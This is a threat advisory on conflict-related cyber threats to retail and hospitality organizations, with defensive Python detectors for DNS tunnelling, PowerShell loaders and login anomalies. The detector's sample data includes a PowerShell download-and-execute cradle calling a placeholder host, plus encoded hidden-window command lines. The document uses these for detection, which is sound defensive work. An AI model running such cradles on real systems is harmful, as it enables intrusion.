Middle East Conflict Cyber Threat Landscape and Defensive Options for Retail, Hospitality, and Travel Organizations

Executive Summary

In late February 2026, the United States and Israel launched joint airstrikes against a wide array of facilities in Iran. Retaliatory strikes have followed, with the conflict escalating to multiple nations in the Middle East. Beyond physical threats to employees and facilities, cyber threats related to the conflict with potential impact on retail and hospitality organizations could include: hacktivist attacks such as defacement, increased social engineering activity leveraging the conflict as a lure theme, fraudsters leveraging the opportunity to target travelers, and potential critical infrastructure disruption. RH-ISAC Core Members are encouraged to maintain situational awareness and to take defensive action where possible.

Key Cyber Takeaways

1. Cyber Operations Were Integral to the Kinetic Strikes and Have Lasting Impact

A coordinated electronic warfare and DDoS campaign impacted Iranian command-and-control before bombs landed, taking internet connectivity to 4% of normal levels and likely hindering counterattack coordination.

2. Iran’s Cyber Retaliation Is Asymmetric and Decentralized

With conventional military capability potentially degraded, cyber operations could become a mode of retaliation. Pro-Iranian threat groups are often located outside Iranian borders and have varying levels of capability, most often tending towards website defacement.

3. Hacktivism Is Amplifying State Objectives

Researchers report over 600 related cyberattack claims across 100+ Telegram channels within days, mirroring the pattern observed in the June 2025 Twelve-Day War. Hacktivism can expand the attack surface, complicate attribution, and create psychological and media pressure.

4. The Target Perimeter Is Widening to Social Engineering and Fraud

Cyber operations have expanded beyond Israel to Gulf states, Jordan, Cyprus, and the United States. INC Ransomware explicitly framed an Israeli company listing as a political act, not a financial one. This starts to erase the line between financially motivated ransomware and state-aligned disruption. Additionally, non-Iranian-aligned threat groups are likely to leverage the conflict as content for social engineering campaigns and especially fraud activity targeting stranded tourists in the region.

5. ICS/OT Systems Are Now Explicitly in Scope

The shift from web defacements toward claimed PLC access and power plant manipulation marks a qualitative escalation. Energy, water, and industrial control systems could face direct targeting by high-competency Iranian state-backed APTs.

Likely Threats

| Threat | Likelihood | Primary Targets |
| --- | --- | --- |
| DDoS campaigns against government portals | Very High | Israel, Gulf states, Jordan, US |
| Spear phishing and credential harvesting | Very High | NGOs, diplomats, defense contractors, media |
| ICS/OT targeting of energy infrastructure | High | Energy sector across the Middle East and Gulf |
| Hack-and-leak / doxxing operations | High | US military-linked entities, Israeli firms |
| Ransomware with political framing | High | Israeli and Gulf commercial targets |
| Wiper malware deployment | Moderate-High | High-value government and defense networks |
| Influence operations and fabricated breach claims | Very High | All sectors, designed to force public response |

Defensive Options

Identity and Access
  • Enforce MFA on all accounts without exception
  • Revoke unnecessary remote access privileges immediately
  • Remove unmanaged RMM tools – MuddyWater actively abuses them for persistence
  • Rotate credentials for all privileged and cloud administrator accounts
Network and Perimeter
  • Patch all internet-facing devices, VPN appliances, and edge infrastructure – Fox Kitten specializes in unpatched perimeters
  • Review DNS query logs for anomalous patterns; OilRig uses DNS hijacking for exfiltration
  • Activate DDoS mitigation on all public-facing portals
  • Segment and isolate all ICS/OT environments from IT networks
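
The DNS log review item above lends itself to a concrete check. The following Python script is an added example and is not part of the RH-ISAC advisory; it assumes a simple query-log format (timestamp, client IP, query name, record type) and runs over constructed sample lines. For each client and registered domain it counts unique subdomains, long high-entropy first labels, and TXT query volume, the signals most commonly associated with DNS-based exfiltration or tunnelling, and raises an alert when any of them crosses a threshold.

```python
import math
import re
from collections import defaultdict

# Constructed sample DNS query log (hypothetical format: timestamp, client, qname, qtype).
# The 10.1.4.57 entries imitate a tunnelling pattern: random-looking labels, TXT records.
SAMPLE_DNS_LOG = """\
2026-03-02T10:00:01Z 10.1.4.22 www.example.com A
2026-03-02T10:00:02Z 10.1.4.22 mail.example.com A
2026-03-02T10:00:03Z 10.1.4.57 k3j9x2m8q7w1z5t4.exfil-example.net TXT
2026-03-02T10:00:04Z 10.1.4.57 p6n0r3v8y2b7d1f9.exfil-example.net TXT
2026-03-02T10:00:05Z 10.1.4.57 h4s2u9c6e1g8a3l7.exfil-example.net TXT
2026-03-02T10:00:06Z 10.1.4.57 m5q1t8w3x7z2j6k9.exfil-example.net TXT
2026-03-02T10:00:07Z 10.1.4.57 b2d7f4h9k1n6p3r8.exfil-example.net TXT
2026-03-02T10:00:08Z 10.1.4.57 c8e3g5j1l7n2q4s9.exfil-example.net TXT
2026-03-02T10:00:09Z 10.1.4.22 cdn.example.com A
2026-03-02T10:00:10Z 10.1.4.31 login.microsoftonline.com A
"""

LOG_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)$")


def shannon_entropy(s):
    """Bits of entropy per character; random-looking labels score close to log2(alphabet)."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(qname):
    # Naive: last two labels. A production check should use the Public Suffix List.
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else qname


def parse_dns_log(text):
    records = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # skip malformed lines rather than crash the review
        ts, client, qname, qtype = m.groups()
        records.append({"ts": ts, "client": client, "qname": qname.lower(), "qtype": qtype.upper()})
    return records


def analyze_dns(records, min_unique_subdomains=5, entropy_threshold=3.0, label_len_threshold=12):
    """Return one alert per (client, registered domain) that shows tunnelling-like behaviour."""
    per_key = defaultdict(lambda: {"subdomains": set(), "txt": 0, "high_entropy": 0, "total": 0})
    for r in records:
        dom = registered_domain(r["qname"])
        stats = per_key[(r["client"], dom)]
        stats["total"] += 1
        sub = r["qname"][:-len(dom)].rstrip(".") if r["qname"].endswith(dom) else ""
        if sub:
            stats["subdomains"].add(sub)
            first_label = sub.split(".")[0]
            if len(first_label) >= label_len_threshold and shannon_entropy(first_label) >= entropy_threshold:
                stats["high_entropy"] += 1
        if r["qtype"] == "TXT":
            stats["txt"] += 1

    alerts = []
    for (client, dom), s in per_key.items():
        reasons = []
        if len(s["subdomains"]) >= min_unique_subdomains:
            reasons.append(f"{len(s['subdomains'])} unique subdomains")
        if s["high_entropy"] >= min_unique_subdomains:
            reasons.append(f"{s['high_entropy']} long high-entropy labels")
        if s["txt"] >= min_unique_subdomains:
            reasons.append(f"{s['txt']} TXT queries")
        if reasons:
            alerts.append({"client": client, "domain": dom, "queries": s["total"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in analyze_dns(parse_dns_log(SAMPLE_DNS_LOG)):
        print(f"ALERT {alert['client']} -> {alert['domain']}: {', '.join(alert['reasons'])}")
```

The thresholds are deliberately low so the constructed sample trips them; on real resolver logs they should be tuned per environment, and a domain allowlist (CDNs, telemetry and security vendors legitimately generate many unique subdomains) added before alerts are routed to analysts.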
Detection and Response
  • Deploy detection rules for PowerShell loaders, RMM abuse, and spear phishing TTPs aligned to MuddyWater and OilRig
  • Establish protocols for responding to Telegram breach claims before media amplification forces a reactive public response
  • Brief senior leadership on the information operations dimension; fabricated claims and leaked documents are deliberate tools
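
The detection-rule item above (PowerShell loaders and RMM abuse) can be expressed as a small scoring rule over process-creation telemetry. The Python below is an added example, not RH-ISAC's or any vendor's detection content; it assumes an EDR/Sysmon-style export with host, user, parent, image and command line fields, and the events, indicator weights, RMM binary names and the approved-RMM inventory are all constructed placeholders that an organization would replace with its own asset list.

```python
import re

# Constructed process-creation events (hypothetical export; not real telemetry).
SAMPLE_PROCESS_EVENTS = [
    {"host": "POS-17", "user": "svc_kiosk", "parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -ep bypass -enc QQBhAGIAYwBkAGUAZgBnAGgAaQBqAGsAbABtAG4A"},
    {"host": "HQ-ADMIN-3", "user": "jsmith", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe Get-ChildItem C:\\Reports | Measure-Object"},
    {"host": "FRONTDESK-2", "user": "reception", "parent": "outlook.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"},
    {"host": "WH-LAPTOP-9", "user": "contractor1", "parent": "msiexec.exe", "image": "RemoteAssistPro.exe",
     "cmdline": "RemoteAssistPro.exe /silent /server=rmm.example.invalid"},
    {"host": "HQ-IT-1", "user": "helpdesk", "parent": "services.exe", "image": "CorpRMMAgent.exe",
     "cmdline": "CorpRMMAgent.exe --service"},
]

# Weighted command-line indicators of loader behaviour; weights are illustrative.
POWERSHELL_INDICATORS = [
    ("encoded_command", re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), 3),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 1),
    ("execution_policy_bypass", re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I), 1),
    ("invoke_expression", re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 2),
    ("download_cradle", re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I), 2),
    ("base64_decode", re.compile(r"frombase64string", re.I), 1),
]
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Hypothetical inventories: RMM agents the organization has approved, and RMM agent
# binaries it knows how to recognise. Both are placeholders to be filled from the CMDB.
APPROVED_RMM = {"corprmmagent.exe"}
KNOWN_RMM_BINARIES = {"corprmmagent.exe", "remoteassistpro.exe"}


def score_powershell(event):
    """Sum indicator weights for one PowerShell event; an Office parent adds extra weight."""
    hits, score = [], 0
    for name, pattern, weight in POWERSHELL_INDICATORS:
        if pattern.search(event["cmdline"]):
            hits.append(name)
            score += weight
    if event["parent"].lower() in OFFICE_PARENTS:
        hits.append("office_parent")
        score += 2
    return score, hits


def detect(events, threshold=3):
    """Return alerts for suspicious PowerShell launches and for RMM agents outside the approved set."""
    alerts = []
    for e in events:
        image = e["image"].lower()
        if image in POWERSHELL_IMAGES:
            score, hits = score_powershell(e)
            if score >= threshold:
                alerts.append({"host": e["host"], "user": e["user"], "type": "powershell_loader",
                               "score": score, "indicators": hits})
        elif image in KNOWN_RMM_BINARIES and image not in APPROVED_RMM:
            alerts.append({"host": e["host"], "user": e["user"], "type": "unapproved_rmm",
                           "score": None, "indicators": [e["image"]]})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_PROCESS_EVENTS):
        print(f"{a['type']:18} {a['host']:12} {a['user']:12} {a['indicators']}")
```

Scoring rather than single-pattern matching keeps the rule from firing on every administrator who runs an encoded command, while still flagging the combination (hidden window, policy bypass, encoded payload, Office parent) that characterises a loader. The RMM check is intentionally an allowlist: any recognised remote-management agent that is not in the approved inventory is worth a ticket, whichever vendor it comes from.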
Cloud and Communications
  • Audit credentials across Microsoft 365, Google Workspace, and collaboration platforms
  • Revoke and reissue all active session tokens
  • Enable login anomaly alerting; APT42 operates almost entirely within cloud environments post-compromise
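
The login anomaly alerting item above is the kind of check that can be prototyped against exported sign-in logs before it is built into the identity platform. The Python below is an added example and not part of the RH-ISAC advisory; it assumes a flat sign-in record (timestamp, user, source IP, country, result) and uses constructed events. It raises three anomaly types: a successful login from a country never before seen for that user, two successful logins from different countries closer together than a travel window, and a burst of failures immediately followed by a success. The travel window and failure thresholds are assumed values.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sign-in events (hypothetical export; RFC 5737 documentation addresses).
SAMPLE_SIGNIN_LOG = """\
2026-03-02T08:00:00Z alice 203.0.113.10 US success
2026-03-02T08:30:00Z alice 203.0.113.10 US success
2026-03-02T09:05:00Z alice 198.51.100.77 BR success
2026-03-02T09:00:00Z bob 192.0.2.5 US failure
2026-03-02T09:01:00Z bob 192.0.2.5 US failure
2026-03-02T09:02:00Z bob 192.0.2.5 US failure
2026-03-02T09:03:00Z bob 192.0.2.5 US failure
2026-03-02T09:04:00Z bob 192.0.2.5 US success
2026-03-02T09:10:00Z carol 203.0.113.44 DE success
2026-03-03T10:00:00Z carol 203.0.113.44 DE success
"""


def parse_signins(text):
    """Parse whitespace-separated sign-in lines and return them sorted by timestamp."""
    events = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue  # ignore malformed lines
        ts, user, ip, country, result = parts
        events.append({
            "ts": datetime.fromisoformat(ts.replace("Z", "+00:00")),
            "user": user, "ip": ip, "country": country, "result": result,
        })
    events.sort(key=lambda e: e["ts"])
    return events


def detect_signin_anomalies(events, travel_window=timedelta(hours=2),
                            fail_threshold=3, fail_window=timedelta(minutes=10)):
    """Return anomaly alerts; the baseline of known countries is built from earlier successes."""
    alerts = []
    seen_countries = defaultdict(set)   # user -> countries with a prior successful login
    last_success = {}                   # user -> most recent successful event
    recent_failures = defaultdict(list) # user -> timestamps of failures since last success

    for e in events:
        u = e["user"]
        if e["result"] != "success":
            recent_failures[u].append(e["ts"])
            continue

        # Burst of failures immediately preceding a success (spray / stuffing pattern).
        fails = [t for t in recent_failures[u] if t >= e["ts"] - fail_window]
        if len(fails) >= fail_threshold:
            alerts.append({"user": u, "type": "failures_then_success", "ts": e["ts"],
                           "detail": f"{len(fails)} failures before success from {e['ip']}"})
        recent_failures[u] = []

        # First successful login sets the baseline; later unseen countries are flagged.
        if seen_countries[u] and e["country"] not in seen_countries[u]:
            alerts.append({"user": u, "type": "new_country", "ts": e["ts"],
                           "detail": f"first login from {e['country']} ({e['ip']})"})

        # Two successes from different countries inside the travel window.
        prev = last_success.get(u)
        if prev and prev["country"] != e["country"] and e["ts"] - prev["ts"] < travel_window:
            alerts.append({"user": u, "type": "impossible_travel", "ts": e["ts"],
                           "detail": f"{prev['country']} -> {e['country']} in {e['ts'] - prev['ts']}"})

        seen_countries[u].add(e["country"])
        last_success[u] = e
    return alerts


if __name__ == "__main__":
    for a in detect_signin_anomalies(parse_signins(SAMPLE_SIGNIN_LOG)):
        print(f"{a['ts'].isoformat()} {a['user']:8} {a['type']:22} {a['detail']}")
```

A country-level comparison is a coarse stand-in for the distance-and-speed calculation a real impossible-travel rule performs, and VPN egress points will produce false positives for both the new-country and travel checks; the value of the prototype is in confirming the log export carries the fields needed before the rule is moved into the identity provider's native alerting.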
Staff Awareness
  • Issue immediate awareness briefings: credential harvesting via social engineering is the primary threat vector, not malware
  • Treat all inbound outreach from journalists, researchers, or conference organizers as potentially adversarial until independently verified
  • Never enter credentials via links received by email, WhatsApp, or Telegram

Timeline of Key Events

February 26, 2026
  • US-Iran nuclear talks in Geneva end without a breakthrough; Oman describes “significant progress” 
February 28, 2026: Operation Epic Fury
  • The United States and Israel launch coordinated strikes targeting Iran’s military command, missile infrastructure, and senior leadership, including Khamenei, the Defense Minister, the IRGC commander, and the army chief of staff 
  • Simultaneous cyberattack takes Iran’s internet connectivity to 4% of normal levels; IRNA goes offline; Tasnim (IRGC-affiliated) is hacked and displays anti-Khamenei messages 
  • Iranian retaliation strikes 27 US military bases; Bahrain’s 5th Fleet HQ struck; Kuwait airport hit; drone hits Dubai’s Fairmont Hotel; Abu Dhabi airport struck. Hacktivist collectives begin mobilizing on Telegram; “Cyber Islamic Resistance” forms an Electronic Operations Room
March 1, 2026
  • RipperSec DDoS claim against K-DEFENSE CORPORATION (Korea)
  • Lapsus$ lists Lacoste, Eni Energy, and Loozap as victims
March 2, 2026: Escalation Day
  • Cyber Islamic Resistance claims access to PLC controllers and energy monitoring dashboards 
  • APT IRAN claims infiltration of Jordan’s power plant control systems, alleging 75% reduction in electricity output 
  • INC Ransomware lists Israeli entity ramet-trom[.]co[.]il, claiming ~1 TB of exfiltrated data including blueprints and contracts, framed as a political attack 
  • DieNet publishes structured target lists across Qatar, Bahrain, UAE, Kuwait, and Saudi Arabia
  • Website defacements coordinated across Israeli sites by Cyber Islamic Resistance and Cyb3r Drag0nz 
  • DragonForce ransomware claims against TIW Group and FGV Brazil
  • DieNet begins framing Cyprus as a legitimate target due to British military bases 
March 3, 2026
  • Handala claims breach of Saudi Aramco, alleging destruction of infrastructure and halting of oil extraction (unverified)
  • Handala claims breach of Israel Opportunity Energy
  • RipperSec DDoS against Israel Deaf Sports Organisation
  • Iranian drone confirmed to have struck Cyprus – validating prior hacktivist threat signaling

Threat Actor Summary

Active Hacktivist Collectives
  • Handala – Highly active; targeting Israeli energy, fuel, military communications, and now claiming Saudi Aramco. Focuses on strategic infrastructure rather than symbolic sites 
  • Cyber Islamic Resistance / 313 Team – Formed a unified Electronic Operations Room; claiming ICS/OT access, targeting Gulf government portals 
  • DieNet – Provides DDoS tooling as an arsenal for smaller groups; targeting Gulf states, government, airports, banks, utilities 
  • RipperSec – Joined the Islamic Cyber Resistance axis; executing DDoS against Israeli and regional targets
  • Moroccan Black Cyber Army – Claimed attack on TCS Communications (Tel Aviv), targeting telecom service layer 
  • Nation of Saviors – Doxxing US military-related entities; data breach claims against Saudi firms 
  • DragonForce / INC Ransomware – Conducting politically framed ransomware attacks against Israeli and regional entities 
State-Linked Iranian APTs

| Group | Key Focus | Notable Tactics |
| --- | --- | --- |
| APT33 | Aerospace, energy, defense | Spear phishing, custom malware, wipers |
| APT34 / OilRig | Middle East gov, telecom, finance | DNS hijacking, credential harvesting |
| APT35 / Charming Kitten | Journalists, academics, policy | Social engineering, cloud credential theft |
| APT42 | NGOs, civil society, healthcare | Impersonation, cloud environment exploitation |
| MuddyWater | Government, transport, industrial | RMM tool abuse, PowerShell loaders |
| CyberAv3ngers | Water utilities, ICS/OT | PLC exploitation, OT device defacement |
| Fox Kitten | VPN appliances, edge devices | Unpatched perimeter exploitation |

 
